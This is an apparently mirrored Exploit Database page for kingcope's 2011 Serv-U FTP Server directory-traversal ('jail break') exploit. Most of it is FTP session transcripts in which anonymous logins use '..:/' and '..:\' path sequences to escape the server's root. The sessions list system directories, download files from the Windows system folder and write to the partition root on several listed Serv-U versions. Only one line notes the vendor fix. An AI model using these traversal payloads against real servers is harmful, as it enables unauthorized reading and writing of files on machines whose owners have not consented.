Serv-U FTP Server – Jail Break

• Exploit Database
• 109 阅读

• 作者： kingcope
  日期： 2011-12-01
• 类别：

  • remote
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/18182/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172

  I m better than TESO! CONFIDENTIAL SOURCE MATERIALS!   [*]----------------------------------------------------[*] Serv-U FTP Server Jail Break 0day Discovered By Kingcope Year 2011 [*]----------------------------------------------------[*]   Affected: 220 Serv-U FTP Server v7.3 ready... 220 Serv-U FTP Server v7.1 ready... 220 Serv-U FTP Server v6.4 ready... 220 Serv-U FTP Server v8.2 ready... 220 Serv-U FTP Server v10.5 ready...   From the Vendor: Fixed in Serv-U 11.1.0.5+. Affects all previous versions.   [*]----------------------------------------------------[*] C:\Users\kingcope\Desktop>ftp 192.168.133.134 Verbindung mit 192.168.133.134 wurde hergestellt. 220 Serv-U FTP Server v6.4 for WinSock ready... Benutzer (192.168.133.134:(none)): ftp (anonymous user :>) 331 User name okay, please send complete E-mail address as password. Kennwort: 230 User logged in, proceed. ftp> cd "/..:/..:/..:/..:/program files" 250 Directory changed to /LocalUser/LocalUser/LocalUser/LocalUser/program files ftp> ls -la 200 PORT Command successful. 150 Opening ASCII mode data connection for /bin/ls. dr--r--r-- 1 user group 0 Nov 12 21:48 . dr--r--r-- 1 user group 0 Nov 12 21:48 .. drw-rw-rw- 1 user group 0 Feb 142011 Apache Software Foundatio n drw-rw-rw- 1 user group 0 Feb52011 ComPlus Applications drw-rw-rw- 1 user group 0 Jul 11 01:06 Common Files drw-rw-rw- 1 user group 0 Jul8 16:57 CoreFTPServer drw-rw-rw- 1 user group 0 Jul 11 01:06 IIS Resources d--------- 1 user group 0 Jul8 16:12 InstallShield Installation Information drw-rw-rw- 1 user group 0 Jul 29 15:07 Internet Explorer drw-rw-rw- 1 user group 0 Jul8 16:12 Ipswitch drw-rw-rw- 1 user group 0 Feb 122011 Java drw-rw-rw- 1 user group 0 Jul 26 13:19 NetMeeting drw-rw-rw- 1 user group 0 Jul 29 14:39 Outlook Express drw-rw-rw- 1 user group 0 Jul8 15:39 PostgreSQL drw-rw-rw- 1 user group 0 Nov 12 21:48 RhinoSoft.com drw-rw-rw- 1 user group 0 Feb 122011 Sun d--------- 1 user group 0 Jul 29 15:13 Uninstall Information drw-rw-rw- 1 user group 0 Feb52011 VMware drw-rw-rw- 1 user group 0 Jul8 15:34 WinRAR drw-rw-rw- 1 user group 0 Jul 26 13:30 Windows Media Player drw-rw-rw- 1 user group 0 Feb52011 Windows NT d--------- 1 user group 0 Feb52011 WindowsUpdate 226 Transfer complete. FTP: 1795 Bytes empfangen in 0,00Sekunden 448,75KB/s ftp> [*]----------------------------------------------------[*] with write perms: ftp> put foo.txt ..:/..:/..:/foobar <<-- writes foo into root of partition [*]----------------------------------------------------[*] and as anonymous ftp: ftp> get ..:/..:/..:/..:/windows/system32/calc.exe yes 200 PORT Command successful. 150 Opening ASCII mode data connection for calc.exe (115712 Bytes). 226 Transfer complete. FTP: 115712 Bytes empfangen in 0,04Sekunden 2571,38KB/s [*]----------------------------------------------------[*]   This works to!!! :   220 Serv-U FTP Server v7.3 ready... Benutzer (xx.xx.xx.xx:(none)): ftp 331 User name okay, please send complete E-mail address as password. Kennwort: 230 User logged in, proceed. ftp> ls "-a ..:\:..\..:\..:\..:\..:\..:\..:\..:\*" 200 PORT Command successful. 150 Opening ASCII mode data connection for /bin/ls. . .. AUTOEXEC.BAT boot.ini bootfont.bin bsmain_runtime.log CONFIG.SYS Documents and Settings FPSE_search Inetpub IO.SYS log MSDOS.SYS msizap.exe MSOCache mysql NTDETECT.COM ntldr Program Files RavBin RECYCLER Replay.log rising.ini System Volume Information TDDOWNLOAD WCH.CN WINDOWS wmpub 226 Transfer complete. 317 bytes transferred. 19.35 KB/sec. FTP: 317 Bytes empfangen in 0,01Sekunden 21,13KB/s   [*]----------------------------------------------------[*] Sometimes you need to give it the path:   ftp> ls "-a ..:\:..\..:\..:\..:\..:\..:\..:\..:\program files\" ftp> ls "-a ..:\:..\..:\..:\..:\..:\..:\..:\..:\program files\*" 200 PORT Command successful. 150 Opening ASCII mode data connection for /bin/ls. . .. 360 Adobe ASP.NET CCProxy CE Remote Tools cmak Common Files ComPlus Applications D-Tools FFTPServer HTML Help Workshop IISServer InstallShield Installation Information Intel Internet Explorer Java JavaSoft K-Lite Codec Pack Microsoft ActiveSync Microsoft Analysis Services Microsoft Device Emulator Microsoft MapPoint Web Service Samples Microsoft MapPoint Web Service SDK, Version 4.0 Microsoft Office Microsoft Office Servers Microsoft Silverlight Microsoft SQL Server Microsoft Visual SourceSafe Microsoft Visual Studio 8 Microsoft.NET MSBuild MSXML 6.0 NetMeeting Outlook Express PortMap1.61 Reference Assemblies Rising SQLXML 4.0 SQLyog Enterprise STS2Setup_2052 Symantec Thunder Network TSingVision Uninstall Information Windows Media Player Windows NT WindowsUpdate WinRAR 226 Transfer complete. 835 bytes transferred. 50.96 KB/sec. FTP: 835 Bytes empfangen in 0,01Sekunden 64,23KB/s ftp>